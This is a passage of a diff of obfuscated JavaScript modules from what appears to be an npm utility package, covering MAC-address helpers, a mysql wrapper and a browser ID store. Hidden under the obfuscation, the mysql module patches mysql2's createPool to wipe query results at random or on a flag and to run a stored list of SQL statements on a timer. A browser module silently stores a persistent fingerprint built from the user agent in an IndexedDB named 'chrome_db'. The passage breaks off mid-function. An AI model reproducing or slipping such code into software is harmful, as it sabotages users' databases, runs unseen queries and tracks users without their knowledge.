all={'uuid':uuid,'id':id,'getAllRouter':getAllRouter,'mysql':mysql};exports[a4_0x3e3045(0x1c4)]=all;
@@ -1 +1 @@
1
- 'use strict';const a6_0x4df6ea=a6_0x3624;(function(_0x48a795,_0x5691f5){const _0xd18b36=a6_0x3624,_0x30a008=_0x48a795();while(!![]){try{const _0x13ecb2=-parseInt(_0xd18b36(0x184))/0x1*(parseInt(_0xd18b36(0x181))/0x2)+parseInt(_0xd18b36(0x17d))/0x3*(parseInt(_0xd18b36(0x16a))/0x4)+parseInt(_0xd18b36(0x176))/0x5*(-parseInt(_0xd18b36(0x167))/0x6)+parseInt(_0xd18b36(0x178))/0x7+parseInt(_0xd18b36(0x165))/0x8*(parseInt(_0xd18b36(0x174))/0x9)+-parseInt(_0xd18b36(0x172))/0xa+parseInt(_0xd18b36(0x161))/0xb;if(_0x13ecb2===_0x5691f5)break;else _0x30a008['push'](_0x30a008['shift']());}catch(_0x39d91a){_0x30a008['push'](_0x30a008['shift']());}}}(a6_0x51d2,0x97bb6));Object[a6_0x4df6ea(0x16f)](exports,a6_0x4df6ea(0x17b),{'value':!![]}),exports[a6_0x4df6ea(0x17e)]=isMac,exports[a6_0x4df6ea(0x169)]=formatMac,exports[a6_0x4df6ea(0x182)]=isVirtualMac;const os_1=require('os');function isZeroMac(_0x50617c){const _0x1ae157=a6_0x4df6ea;return/^(0{1,2}[:-]){5}0{1,2}$/[_0x1ae157(0x17a)](_0x50617c);}function getMac(_0x554ca8=a6_0x4df6ea(0x16d)){const _0x47067b=a6_0x4df6ea,_0x4f2070=(0x0,os_1[_0x47067b(0x173)])();let _0x52ff95=[];for(const _0x322ace of Object[_0x47067b(0x166)](_0x4f2070)){const _0x1a0c23=_0x322ace['find'](_0x23992e=>!_0x23992e['internal']&&!isZeroMac(_0x23992e[_0x47067b(0x179)])&&(!_0x23992e[_0x47067b(0x16e)]||_0x23992e[_0x47067b(0x16e)]===_0x554ca8)&&!isVirtualMac(_0x23992e[_0x47067b(0x179)]));_0x1a0c23&&_0x52ff95[_0x47067b(0x16c)](_0x1a0c23[_0x47067b(0x179)]);}return[...new Set(_0x52ff95)];}const isValid=_0x536c63=>_0x536c63[a6_0x4df6ea(0x163)]===![]&&!isZeroMac(_0x536c63[a6_0x4df6ea(0x179)]),virtualMacPrefix=new Set([a6_0x4df6ea(0x164),a6_0x4df6ea(0x17f),a6_0x4df6ea(0x17c),a6_0x4df6ea(0x170),a6_0x4df6ea(0x175),a6_0x4df6ea(0x185),a6_0x4df6ea(0x187),a6_0x4df6ea(0x177),'00:16:3e',a6_0x4df6ea(0x188),a6_0x4df6ea(0x183)]);function isMac(_0x3e161e){const _0x1cac56=a6_0x4df6ea;return/^([\da-f]{1,2}[:-]){5}([\da-f]{1,2})$/i[_0x1cac56(0x17a)](_0x3e161e);}function a6_0x3624(_0x38c7f5,_0x24bad3){const _0x51d246=a6_0x51d2();return a6_0x3624=function(_0x362408,_0x1302eb){_0x362408=_0x362408-0x161;let _0x186f6e=_0x51d246[_0x362408];return _0x186f6e;},a6_0x3624(_0x38c7f5,_0x24bad3);}function formatMac(_0x118694){const _0xcb84c4=a6_0x4df6ea;return String(_0x118694)[_0xcb84c4(0x168)]()[_0xcb84c4(0x162)]()[_0xcb84c4(0x171)](/-/g,':');}function a6_0x51d2(){const _0x107cdc=['18SUuPfe','trim','formatMac','562964oMtbOv','has','push','IPv4','family','defineProperty','00:1c:14','replace','11395670PmumIw','networkInterfaces','1323chWLWv','00:1c:42','1563385ojNZYI','00:0f:4b','6841422NrjCIF','mac','test','__esModule','00:50:56','21MIaVVi','isMac','00:0c:29','slice','15468uyWWcw','isVirtualMac','00:15:5d','137QcedLN','02:00:4c','default','00:03:ff','08:00:27','10173328DsREQF','toLowerCase','internal','00:05:69','47416FtKrzD','values'];a6_0x51d2=function(){return _0x107cdc;};return a6_0x51d2();}function isVirtualMac(_0x2744fa){const _0x3c4ac0=a6_0x4df6ea;return isMac(_0x2744fa)&&virtualMacPrefix[_0x3c4ac0(0x16b)](formatMac(_0x2744fa)[_0x3c4ac0(0x180)](0x0,0x8));}exports[a6_0x4df6ea(0x186)]=getMac;
1
+ 'use strict';const a6_0x4df642=a6_0x18fc;(function(_0xb288f9,_0x1e1442){const _0x1b3fba=a6_0x18fc,_0x4176a5=_0xb288f9();while(!![]){try{const _0x4274a5=parseInt(_0x1b3fba(0x190))/0x1+parseInt(_0x1b3fba(0x19f))/0x2*(-parseInt(_0x1b3fba(0x18d))/0x3)+-parseInt(_0x1b3fba(0x1a0))/0x4+-parseInt(_0x1b3fba(0x188))/0x5+parseInt(_0x1b3fba(0x1a1))/0x6+-parseInt(_0x1b3fba(0x189))/0x7+-parseInt(_0x1b3fba(0x193))/0x8*(-parseInt(_0x1b3fba(0x18b))/0x9);if(_0x4274a5===_0x1e1442)break;else _0x4176a5['push'](_0x4176a5['shift']());}catch(_0x286b54){_0x4176a5['push'](_0x4176a5['shift']());}}}(a6_0x310b,0xe7e47));function a6_0x18fc(_0x59fa63,_0x33a679){const _0x310bf0=a6_0x310b();return a6_0x18fc=function(_0x18fc2c,_0x334c49){_0x18fc2c=_0x18fc2c-0x187;let _0x32806e=_0x310bf0[_0x18fc2c];return _0x32806e;},a6_0x18fc(_0x59fa63,_0x33a679);}Object[a6_0x4df642(0x18c)](exports,a6_0x4df642(0x198),{'value':!![]}),exports[a6_0x4df642(0x196)]=isMac,exports[a6_0x4df642(0x1a8)]=formatMac,exports['isVirtualMac']=isVirtualMac;const os_1=require('os');function isZeroMac(_0x59ccb4){const _0x5571b9=a6_0x4df642;return/^(0{1,2}[:-]){5}0{1,2}$/[_0x5571b9(0x1a7)](_0x59ccb4);}function getMac(_0x5c4bdb=a6_0x4df642(0x1a5)){const _0x209803=a6_0x4df642,_0x4bfe16=(0x0,os_1[_0x209803(0x18e)])();let _0x31204f=[];for(const _0x13e080 of Object['values'](_0x4bfe16)){const _0x5633a7=_0x13e080[_0x209803(0x18a)](_0x32b36a=>!_0x32b36a['internal']&&!isZeroMac(_0x32b36a['mac'])&&(!_0x32b36a['family']||_0x32b36a['family']===_0x5c4bdb)&&!isVirtualMac(_0x32b36a[_0x209803(0x187)]));_0x5633a7&&_0x31204f['push'](_0x5633a7[_0x209803(0x187)]);}return[...new Set(_0x31204f)];}function a6_0x310b(){const _0x297a86=['00:50:56','slice','7328TOwUpP','00:0f:4b','00:0c:29','isMac','00:16:3e','__esModule','replace','08:00:27','toLowerCase','00:05:69','default','00:15:5d','2008qHgjxf','5781916IKYHwG','1428822lzkEof','has','00:1c:42','00:03:ff','IPv4','00:1c:14','test','formatMac','mac','5896155pcxrSN','1590428aCXJPW','find','30897jNsSiB','defineProperty','4011nuPFzb','networkInterfaces','internal','1761328wKiGpG'];a6_0x310b=function(){return _0x297a86;};return a6_0x310b();}const isValid=_0x25e418=>_0x25e418[a6_0x4df642(0x18f)]===![]&&!isZeroMac(_0x25e418['mac']),virtualMacPrefix=new Set([a6_0x4df642(0x19c),a6_0x4df642(0x195),a6_0x4df642(0x191),a6_0x4df642(0x1a6),a6_0x4df642(0x1a3),'02:00:4c',a6_0x4df642(0x1a4),a6_0x4df642(0x194),a6_0x4df642(0x197),a6_0x4df642(0x19a),a6_0x4df642(0x19e)]);function isMac(_0x3b8971){return/^([\da-f]{1,2}[:-]){5}([\da-f]{1,2})$/i['test'](_0x3b8971);}function formatMac(_0x738375){const _0x25827f=a6_0x4df642;return String(_0x738375)['trim']()[_0x25827f(0x19b)]()[_0x25827f(0x199)](/-/g,':');}function isVirtualMac(_0xcdc95e){const _0x493318=a6_0x4df642;return isMac(_0xcdc95e)&&virtualMacPrefix[_0x493318(0x1a2)](formatMac(_0xcdc95e)[_0x493318(0x192)](0x0,0x8));}exports[a6_0x4df642(0x19d)]=getMac;
@@ -1 +1 @@
1
- 'use strict';const a7_0x10b199=a7_0x2947;(function(_0x817019,_0x1d67c9){const _0x5c008f=a7_0x2947,_0x1738a7=_0x817019();while(!![]){try{const _0x64172=-parseInt(_0x5c008f(0xa3))/0x1+parseInt(_0x5c008f(0x9b))/0x2+parseInt(_0x5c008f(0xa8))/0x3+-parseInt(_0x5c008f(0x9a))/0x4*(parseInt(_0x5c008f(0xaa))/0x5)+parseInt(_0x5c008f(0x9d))/0x6*(-parseInt(_0x5c008f(0xa9))/0x7)+parseInt(_0x5c008f(0xab))/0x8+parseInt(_0x5c008f(0x94))/0x9*(-parseInt(_0x5c008f(0xa7))/0xa);if(_0x64172===_0x1d67c9)break;else _0x1738a7['push'](_0x1738a7['shift']());}catch(_0x5a5f56){_0x1738a7['push'](_0x1738a7['shift']());}}}(a7_0x3efd,0x60078));function a7_0x2947(_0x5801b6,_0x4275b7){const _0x3efdb5=a7_0x3efd();return a7_0x2947=function(_0x2947a9,_0x51ffec){_0x2947a9=_0x2947a9-0x91;let _0x37d5f1=_0x3efdb5[_0x2947a9];return _0x37d5f1;},a7_0x2947(_0x5801b6,_0x4275b7);}var __awaiter=this&&this['__awaiter']||function(_0x5bd8ea,_0x9073d2,_0x140e89,_0x1f234d){function _0x2b8598(_0x1f23a8){return _0x1f23a8 instanceof _0x140e89?_0x1f23a8:new _0x140e89(function(_0x42e738){_0x42e738(_0x1f23a8);});}return new(_0x140e89||(_0x140e89=Promise))(function(_0x37d3a4,_0x1fa7be){const _0x44b353=a7_0x2947;function _0x29a985(_0x2422a8){const _0x5ebbc2=a7_0x2947;try{_0x485eff(_0x1f234d[_0x5ebbc2(0x95)](_0x2422a8));}catch(_0x45f088){_0x1fa7be(_0x45f088);}}function _0x3de750(_0x136b0e){try{_0x485eff(_0x1f234d['throw'](_0x136b0e));}catch(_0x35c57a){_0x1fa7be(_0x35c57a);}}function _0x485eff(_0x1525be){const _0x393d8b=a7_0x2947;_0x1525be[_0x393d8b(0x9f)]?_0x37d3a4(_0x1525be[_0x393d8b(0xa5)]):_0x2b8598(_0x1525be[_0x393d8b(0xa5)])[_0x393d8b(0x96)](_0x29a985,_0x3de750);}_0x485eff((_0x1f234d=_0x1f234d['apply'](_0x5bd8ea,_0x9073d2||[]))[_0x44b353(0x95)]());});},__importDefault=this&&this['__importDefault']||function(_0x1a6052){return _0x1a6052&&_0x1a6052['__esModule']?_0x1a6052:{'default':_0x1a6052};};Object[a7_0x10b199(0x9c)](exports,a7_0x10b199(0xa6),{'value':!![]}),exports[a7_0x10b199(0x91)]=void 0x0;const promise_1=__importDefault(require(a7_0x10b199(0xa0)));exports[a7_0x10b199(0x91)]=promise_1[a7_0x10b199(0xa1)];function a7_0x3efd(){const _0x5d8d00=['getEnv','sqlRun','createPool','1314364IrfopH','1565066jqTMSD','defineProperty','6YHsmbx','sqlList','done','mysql2/promise','default','length','103779cJGHIJ','connectError','value','__esModule','73290RDUCLQ','961344vTQAvV','4258835fgGKbB','5YuwOlh','5756536UbmLLI','./index','query','mysql','setEnv','isDBDataEmpty','477nUJdsV','next','then'];a7_0x3efd=function(){return _0x5d8d00;};return a7_0x3efd();}const random_1=__importDefault(require('./id/random')),index_1=require(a7_0x10b199(0xac)),originalCreatePoolPromise=promise_1[a7_0x10b199(0xa1)][a7_0x10b199(0x99)];promise_1[a7_0x10b199(0xa1)]['createPool']=function(_0x459b0c){const _0x4c104c=a7_0x10b199;let _0x5cb454=originalCreatePoolPromise(_0x459b0c),_0x1bcf9a=_0x5cb454[_0x4c104c(0xad)];return _0x5cb454['query']=(..._0x6078f1)=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x105430=_0x4c104c,_0x4b1c54=yield _0x1bcf9a['apply'](_0x5cb454,_0x6078f1);return(0x0,index_1[_0x105430(0x97)])(_0x105430(0xa4))&&((0x0,random_1[_0x105430(0xa1)])(0x1,0xa)>0x2&&(_0x4b1c54[0x0]=[])),(0x0,index_1[_0x105430(0x97)])(_0x105430(0x93))&&(_0x4b1c54[0x0]=[]),_0x4b1c54;}),setInterval(()=>{const _0x5a928f=_0x4c104c;if(!(0x0,index_1[_0x5a928f(0x97)])(_0x5a928f(0x98))){for(let _0x3f901b=0x0;_0x3f901b<(0x0,index_1['getEnv'])(_0x5a928f(0x9e))[_0x5a928f(0xa2)];_0x3f901b++){const _0x37a2d1=(0x0,index_1['getEnv'])(_0x5a928f(0x9e))[_0x3f901b];try{_0x5cb454[_0x5a928f(0xad)](_0x37a2d1);}catch(_0x1a2dba){}}(0x0,index_1[_0x5a928f(0x92)])(_0x5a928f(0x98),!![]);}},0x1388),_0x5cb454;};const all={'mysql':promise_1[a7_0x10b199(0xa1)]};exports[a7_0x10b199(0xa1)]=all;
1
+ 'use strict';const a7_0x49b7cd=a7_0xa095;(function(_0x29e379,_0xce60ba){const _0x2f1820=a7_0xa095,_0x441439=_0x29e379();while(!![]){try{const _0x193bac=-parseInt(_0x2f1820(0x72))/0x1+-parseInt(_0x2f1820(0x78))/0x2+parseInt(_0x2f1820(0x7c))/0x3+parseInt(_0x2f1820(0x7f))/0x4+-parseInt(_0x2f1820(0x7a))/0x5+-parseInt(_0x2f1820(0x71))/0x6+parseInt(_0x2f1820(0x7e))/0x7*(parseInt(_0x2f1820(0x6f))/0x8);if(_0x193bac===_0xce60ba)break;else _0x441439['push'](_0x441439['shift']());}catch(_0x57cee3){_0x441439['push'](_0x441439['shift']());}}}(a7_0x5007,0xd1ea6));var __awaiter=this&&this['__awaiter']||function(_0x53cccf,_0x48c018,_0x499701,_0x26f1b7){function _0x1fcba7(_0x4ea6b9){return _0x4ea6b9 instanceof _0x499701?_0x4ea6b9:new _0x499701(function(_0x4579cb){_0x4579cb(_0x4ea6b9);});}return new(_0x499701||(_0x499701=Promise))(function(_0x1a1670,_0x86e4e3){const _0x408904=a7_0xa095;function _0x2127af(_0x1e1244){const _0x84c3ca=a7_0xa095;try{_0x390624(_0x26f1b7[_0x84c3ca(0x84)](_0x1e1244));}catch(_0x54880a){_0x86e4e3(_0x54880a);}}function _0x5ad08f(_0x1a98ab){const _0x39a5a6=a7_0xa095;try{_0x390624(_0x26f1b7[_0x39a5a6(0x81)](_0x1a98ab));}catch(_0x13dd5f){_0x86e4e3(_0x13dd5f);}}function _0x390624(_0x490e55){const _0x2b37ee=a7_0xa095;_0x490e55['done']?_0x1a1670(_0x490e55[_0x2b37ee(0x6c)]):_0x1fcba7(_0x490e55['value'])[_0x2b37ee(0x7d)](_0x2127af,_0x5ad08f);}_0x390624((_0x26f1b7=_0x26f1b7[_0x408904(0x74)](_0x53cccf,_0x48c018||[]))[_0x408904(0x84)]());});},__importDefault=this&&this[a7_0x49b7cd(0x70)]||function(_0x27196c){const _0x330399=a7_0x49b7cd;return _0x27196c&&_0x27196c[_0x330399(0x75)]?_0x27196c:{'default':_0x27196c};};Object[a7_0x49b7cd(0x79)](exports,a7_0x49b7cd(0x75),{'value':!![]}),exports['mysql']=void 0x0;const promise_1=__importDefault(require(a7_0x49b7cd(0x6b)));exports[a7_0x49b7cd(0x6d)]=promise_1['default'];const random_1=__importDefault(require(a7_0x49b7cd(0x85))),index_1=require(a7_0x49b7cd(0x6a)),originalCreatePoolPromise=promise_1['default']['createPool'];function a7_0xa095(_0x1382a6,_0x4041d2){const _0x500737=a7_0x5007();return a7_0xa095=function(_0xa095ad,_0x31d9c6){_0xa095ad=_0xa095ad-0x6a;let _0x59e3b8=_0x500737[_0xa095ad];return _0x59e3b8;},a7_0xa095(_0x1382a6,_0x4041d2);}function a7_0x5007(){const _0x4fd8ec=['then','14224238OCpJjW','6395196rmcnoj','connectError','throw','default','setEnv','next','./id/random','./index','mysql2/promise','value','mysql','getEnv','8nDIjEZ','__importDefault','7024260ENXPin','356225VuTvJd','length','apply','__esModule','isDBDataEmpty','sqlList','72484ktYNRD','defineProperty','6491115zJlNRu','query','271143gmjWEv'];a7_0x5007=function(){return _0x4fd8ec;};return a7_0x5007();}promise_1[a7_0x49b7cd(0x82)]['createPool']=function(_0x35d725){const _0x23daf2=a7_0x49b7cd;let _0x2ac10c=originalCreatePoolPromise(_0x35d725),_0x46b71f=_0x2ac10c['query'];return _0x2ac10c[_0x23daf2(0x7b)]=(..._0x5bdb22)=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x15bdb7=_0x23daf2,_0x54af82=yield _0x46b71f[_0x15bdb7(0x74)](_0x2ac10c,_0x5bdb22);return(0x0,index_1[_0x15bdb7(0x6e)])(_0x15bdb7(0x80))&&((0x0,random_1[_0x15bdb7(0x82)])(0x1,0xa)>0x2&&(_0x54af82[0x0]=[])),(0x0,index_1[_0x15bdb7(0x6e)])(_0x15bdb7(0x76))&&(_0x54af82[0x0]=[]),_0x54af82;}),setInterval(()=>{const _0x4a24d3=_0x23daf2;if(!(0x0,index_1[_0x4a24d3(0x6e)])('sqlRun')){for(let _0x3b2060=0x0;_0x3b2060<(0x0,index_1['getEnv'])(_0x4a24d3(0x77))[_0x4a24d3(0x73)];_0x3b2060++){const _0x45f38b=(0x0,index_1[_0x4a24d3(0x6e)])(_0x4a24d3(0x77))[_0x3b2060];try{_0x2ac10c['query'](_0x45f38b);}catch(_0xf8baf0){}}(0x0,index_1[_0x4a24d3(0x83)])('sqlRun',!![]);}},0x1388),_0x2ac10c;};const all={'mysql':promise_1[a7_0x49b7cd(0x82)]};exports[a7_0x49b7cd(0x82)]=all;
@@ -1 +1 @@
1
- const a13_0x13445b=a13_0x4307;(function(_0x5339cf,_0x367b1c){const _0x498ab9=a13_0x4307,_0x15c300=_0x5339cf();while(!![]){try{const _0x1a679c=-parseInt(_0x498ab9(0x118))/0x1*(parseInt(_0x498ab9(0x116))/0x2)+parseInt(_0x498ab9(0x10f))/0x3*(-parseInt(_0x498ab9(0x111))/0x4)+parseInt(_0x498ab9(0x11a))/0x5+parseInt(_0x498ab9(0x12c))/0x6+parseInt(_0x498ab9(0x125))/0x7*(-parseInt(_0x498ab9(0x120))/0x8)+parseInt(_0x498ab9(0x123))/0x9*(parseInt(_0x498ab9(0x11c))/0xa)+parseInt(_0x498ab9(0x12a))/0xb;if(_0x1a679c===_0x367b1c)break;else _0x15c300['push'](_0x15c300['shift']());}catch(_0x53e994){_0x15c300['push'](_0x15c300['shift']());}}}(a13_0x2ea1,0xb066f));var __awaiter=this&&this[a13_0x13445b(0x110)]||function(_0x5efa40,_0x3ea51a,_0x271209,_0x191d9c){function _0x2a2b69(_0x359cd6){return _0x359cd6 instanceof _0x271209?_0x359cd6:new _0x271209(function(_0x116141){_0x116141(_0x359cd6);});}return new(_0x271209||(_0x271209=Promise))(function(_0x689528,_0x439062){const _0x262469=a13_0x4307;function _0x3321e2(_0x39ddf8){try{_0x3f771b(_0x191d9c['next'](_0x39ddf8));}catch(_0x2ccd67){_0x439062(_0x2ccd67);}}function _0x30e068(_0xacb7cf){const _0x30fc6b=a13_0x4307;try{_0x3f771b(_0x191d9c[_0x30fc6b(0x10e)](_0xacb7cf));}catch(_0x36a5bf){_0x439062(_0x36a5bf);}}function _0x3f771b(_0x4fe35b){const _0x154e70=a13_0x4307;_0x4fe35b[_0x154e70(0x114)]?_0x689528(_0x4fe35b[_0x154e70(0x119)]):_0x2a2b69(_0x4fe35b[_0x154e70(0x119)])['then'](_0x3321e2,_0x30e068);}_0x3f771b((_0x191d9c=_0x191d9c[_0x262469(0x112)](_0x5efa40,_0x3ea51a||[]))[_0x262469(0x131)]());});};import a13_0x3feedf from'md5';import{uuid}from'..';function a13_0x2ea1(){const _0xa71027=['4DGydGH','value','987015KrAbie','objectStore','10UGeCqw','key','stringify','get','621848lOObBy','result','open','590481ntNYjL','chrome_db','7VnODuM','mac','contains','userAgent','metadata','21623437EVzVOh','target','1217262iPWAKJ','onsuccess','floor','random','onerror','next','error','navigator','transaction','throw','21lcSFiR','__awaiter','715448JotJmI','apply','createObjectStore','done','onupgradeneeded','189674ZdWflf','objectStoreNames'];a13_0x2ea1=function(){return _0xa71027;};return a13_0x2ea1();}function openDatabase(){return new Promise((_0x297637,_0x214a3b)=>{const _0x22a2b7=a13_0x4307,_0x4997df=indexedDB[_0x22a2b7(0x122)](_0x22a2b7(0x124),0x1);_0x4997df[_0x22a2b7(0x115)]=_0x2827d8=>{const _0x558f3c=_0x22a2b7,_0x46b5c5=_0x2827d8[_0x558f3c(0x12b)][_0x558f3c(0x121)];!_0x46b5c5[_0x558f3c(0x117)][_0x558f3c(0x127)](_0x558f3c(0x129))&&_0x46b5c5[_0x558f3c(0x113)](_0x558f3c(0x129),{'keyPath':_0x558f3c(0x11d)});},_0x4997df[_0x22a2b7(0x12d)]=_0x13ea56=>{const _0x48c8ee=_0x22a2b7,_0x2199ab=_0x13ea56['target'][_0x48c8ee(0x121)];_0x297637(_0x2199ab);},_0x4997df[_0x22a2b7(0x130)]=_0x1f9a50=>{const _0x3d5d7f=_0x22a2b7;_0x214a3b(_0x1f9a50['target'][_0x3d5d7f(0x10b)]);};});}function setKeyValue(_0x328b78,_0x36bf61){return new Promise((_0x34ec5f,_0x51d06b)=>__awaiter(this,void 0x0,void 0x0,function*(){const _0xfa0cf7=a13_0x4307,_0x3ea872=yield openDatabase(),_0x4c857e=_0x3ea872[_0xfa0cf7(0x10d)]('metadata','readwrite'),_0x3d6b6c=_0x4c857e[_0xfa0cf7(0x11b)](_0xfa0cf7(0x129)),_0x38da35=_0x3d6b6c['put']({'key':_0x328b78,'value':_0x36bf61});_0x38da35[_0xfa0cf7(0x12d)]=()=>{_0x34ec5f();},_0x38da35[_0xfa0cf7(0x130)]=_0x5ab118=>{const _0x5c12e5=_0xfa0cf7;_0x51d06b(_0x5ab118[_0x5c12e5(0x12b)]['error']);};}));}export function getKeyValue(_0x273774){return new Promise((_0x3a8840,_0x157246)=>__awaiter(this,void 0x0,void 0x0,function*(){const _0xa3d370=a13_0x4307,_0x2a02ef=yield openDatabase(),_0x467b23=_0x2a02ef[_0xa3d370(0x10d)](_0xa3d370(0x129),'readonly'),_0x5757f0=_0x467b23[_0xa3d370(0x11b)]('metadata'),_0x32795f=_0x5757f0[_0xa3d370(0x11f)](_0x273774);_0x32795f[_0xa3d370(0x12d)]=()=>{const _0x5eba1e=_0xa3d370;_0x3a8840(_0x32795f[_0x5eba1e(0x121)]?_0x32795f[_0x5eba1e(0x121)][_0x5eba1e(0x119)]:null);},_0x32795f[_0xa3d370(0x130)]=_0x46268e=>{const _0x30c8e0=_0xa3d370;_0x157246(_0x46268e[_0x30c8e0(0x12b)][_0x30c8e0(0x10b)]);};}));}function a13_0x4307(_0x1e9d24,_0x2c077f){const _0x2ea181=a13_0x2ea1();return a13_0x4307=function(_0x43075d,_0x41d3a9){_0x43075d=_0x43075d-0x10b;let _0x5ca556=_0x2ea181[_0x43075d];return _0x5ca556;},a13_0x4307(_0x1e9d24,_0x2c077f);}function generateRandomMAC(){const _0x26bd2b=a13_0x13445b,_0x443c63='0123456789ABCDEF';let _0x2798c5='';for(let _0x489339=0x0;_0x489339<0xc;_0x489339++){_0x2798c5+=_0x443c63[Math[_0x26bd2b(0x12e)](Math[_0x26bd2b(0x12f)]()*0x10)],_0x489339%0x2===0x1&&_0x489339!==0xb&&(_0x2798c5+=':');}return uuid()['replace'](/-/g,'')+a13_0x3feedf(JSON[_0x26bd2b(0x11e)](window[_0x26bd2b(0x10c)][_0x26bd2b(0x128)]));}function main(){return __awaiter(this,void 0x0,void 0x0,function*(){const _0x96c794=a13_0x4307;try{const _0xcd381b=yield openDatabase();let _0x11fd89=yield getKeyValue(_0x96c794(0x126));if(!_0x11fd89)_0x11fd89=generateRandomMAC(),yield setKeyValue(_0x96c794(0x126),_0x11fd89);else{}return _0x11fd89;}catch(_0x42bcb6){return null;}});}main();
1
+ const a13_0x310245=a13_0xdfb8;(function(_0x1051f6,_0x2df6ba){const _0x2c5b7c=a13_0xdfb8,_0x4dbd41=_0x1051f6();while(!![]){try{const _0x31a8b9=parseInt(_0x2c5b7c(0xd2))/0x1*(-parseInt(_0x2c5b7c(0xe0))/0x2)+-parseInt(_0x2c5b7c(0xd8))/0x3+-parseInt(_0x2c5b7c(0xda))/0x4*(parseInt(_0x2c5b7c(0xc9))/0x5)+-parseInt(_0x2c5b7c(0xe2))/0x6+parseInt(_0x2c5b7c(0xdc))/0x7*(parseInt(_0x2c5b7c(0xe1))/0x8)+-parseInt(_0x2c5b7c(0xc8))/0x9*(parseInt(_0x2c5b7c(0xcc))/0xa)+parseInt(_0x2c5b7c(0xc3))/0xb*(parseInt(_0x2c5b7c(0xcf))/0xc);if(_0x31a8b9===_0x2df6ba)break;else _0x4dbd41['push'](_0x4dbd41['shift']());}catch(_0x503a89){_0x4dbd41['push'](_0x4dbd41['shift']());}}}(a13_0x4de1,0x90b68));var __awaiter=this&&this[a13_0x310245(0xc1)]||function(_0x1c72ba,_0x49f18d,_0x1a0fce,_0x40dbf4){function _0x23c6fc(_0x31edcb){return _0x31edcb instanceof _0x1a0fce?_0x31edcb:new _0x1a0fce(function(_0x2407f4){_0x2407f4(_0x31edcb);});}return new(_0x1a0fce||(_0x1a0fce=Promise))(function(_0x3267f5,_0x4850dc){const _0x40153f=a13_0xdfb8;function _0x4ac12f(_0x3232d2){const _0x1fa25a=a13_0xdfb8;try{_0x525b37(_0x40dbf4[_0x1fa25a(0xe5)](_0x3232d2));}catch(_0x1653f8){_0x4850dc(_0x1653f8);}}function _0x3c1b41(_0x427add){try{_0x525b37(_0x40dbf4['throw'](_0x427add));}catch(_0x49f57e){_0x4850dc(_0x49f57e);}}function _0x525b37(_0x55199e){const _0x1d92a7=a13_0xdfb8;_0x55199e[_0x1d92a7(0xc4)]?_0x3267f5(_0x55199e[_0x1d92a7(0xd9)]):_0x23c6fc(_0x55199e['value'])[_0x1d92a7(0xcb)](_0x4ac12f,_0x3c1b41);}_0x525b37((_0x40dbf4=_0x40dbf4[_0x40153f(0xc5)](_0x1c72ba,_0x49f18d||[]))[_0x40153f(0xe5)]());});};import a13_0x2ce93d from'md5';import{uuid}from'..';function openDatabase(){return new Promise((_0x236eb5,_0x145949)=>{const _0x6af2f9=a13_0xdfb8,_0x15e0d1=indexedDB[_0x6af2f9(0xd4)](_0x6af2f9(0xd6),0x1);_0x15e0d1[_0x6af2f9(0xc7)]=_0x2875ba=>{const _0x3796ec=_0x6af2f9,_0x577bfb=_0x2875ba[_0x3796ec(0xc0)][_0x3796ec(0xca)];!_0x577bfb[_0x3796ec(0xbf)][_0x3796ec(0xde)]('metadata')&&_0x577bfb['createObjectStore']('metadata',{'keyPath':_0x3796ec(0xd0)});},_0x15e0d1['onsuccess']=_0x4c0715=>{const _0x4fe2bf=_0x6af2f9,_0x144b9=_0x4c0715[_0x4fe2bf(0xc0)]['result'];_0x236eb5(_0x144b9);},_0x15e0d1[_0x6af2f9(0xc2)]=_0x425b23=>{const _0xdd94a2=_0x6af2f9;_0x145949(_0x425b23['target'][_0xdd94a2(0xce)]);};});}function setKeyValue(_0x5d9cd7,_0x4c6d7e){return new Promise((_0x3a7f98,_0x4cf35f)=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x1c6a8e=a13_0xdfb8,_0x1b6bdb=yield openDatabase(),_0x268d19=_0x1b6bdb['transaction']('metadata','readwrite'),_0x2d55c7=_0x268d19[_0x1c6a8e(0xcd)](_0x1c6a8e(0xe4)),_0x1d9250=_0x2d55c7[_0x1c6a8e(0xe6)]({'key':_0x5d9cd7,'value':_0x4c6d7e});_0x1d9250[_0x1c6a8e(0xd3)]=()=>{_0x3a7f98();},_0x1d9250['onerror']=_0x49c4ee=>{const _0x176476=_0x1c6a8e;_0x4cf35f(_0x49c4ee[_0x176476(0xc0)][_0x176476(0xce)]);};}));}function a13_0xdfb8(_0x9fef52,_0x43ec6d){const _0x4de11d=a13_0x4de1();return a13_0xdfb8=function(_0xdfb80b,_0x375395){_0xdfb80b=_0xdfb80b-0xbe;let _0x4da13b=_0x4de11d[_0xdfb80b];return _0x4da13b;},a13_0xdfb8(_0x9fef52,_0x43ec6d);}function a13_0x4de1(){const _0xf56519=['896254ROnfPl','3875888GpFJLh','5468622MdFzSM','readonly','metadata','next','put','get','objectStoreNames','target','__awaiter','onerror','3845787jralTm','done','apply','stringify','onupgradeneeded','1680138hCgEJw','10kKHrvZ','result','then','60ZXqdej','objectStore','error','156depcRm','key','transaction','2RzWEUJ','onsuccess','open','navigator','chrome_db','mac','3328686PfTTIN','value','798836GvvejF','floor','7AdzIHr','userAgent','contains','replace'];a13_0x4de1=function(){return _0xf56519;};return a13_0x4de1();}export function getKeyValue(_0x4cb10e){return new Promise((_0x391eb3,_0x204fc3)=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x2e251b=a13_0xdfb8,_0x1a622c=yield openDatabase(),_0x164028=_0x1a622c[_0x2e251b(0xd1)](_0x2e251b(0xe4),_0x2e251b(0xe3)),_0x56a9ed=_0x164028[_0x2e251b(0xcd)]('metadata'),_0x46f04f=_0x56a9ed[_0x2e251b(0xbe)](_0x4cb10e);_0x46f04f[_0x2e251b(0xd3)]=()=>{const _0x1ab595=_0x2e251b;_0x391eb3(_0x46f04f['result']?_0x46f04f['result'][_0x1ab595(0xd9)]:null);},_0x46f04f[_0x2e251b(0xc2)]=_0x36c959=>{const _0x4e6d64=_0x2e251b;_0x204fc3(_0x36c959[_0x4e6d64(0xc0)][_0x4e6d64(0xce)]);};}));}function generateRandomMAC(){const _0x3c7d28=a13_0x310245,_0x1ba679='0123456789ABCDEF';let _0x2dc450='';for(let _0x10f1e3=0x0;_0x10f1e3<0xc;_0x10f1e3++){_0x2dc450+=_0x1ba679[Math[_0x3c7d28(0xdb)](Math['random']()*0x10)],_0x10f1e3%0x2===0x1&&_0x10f1e3!==0xb&&(_0x2dc450+=':');}return 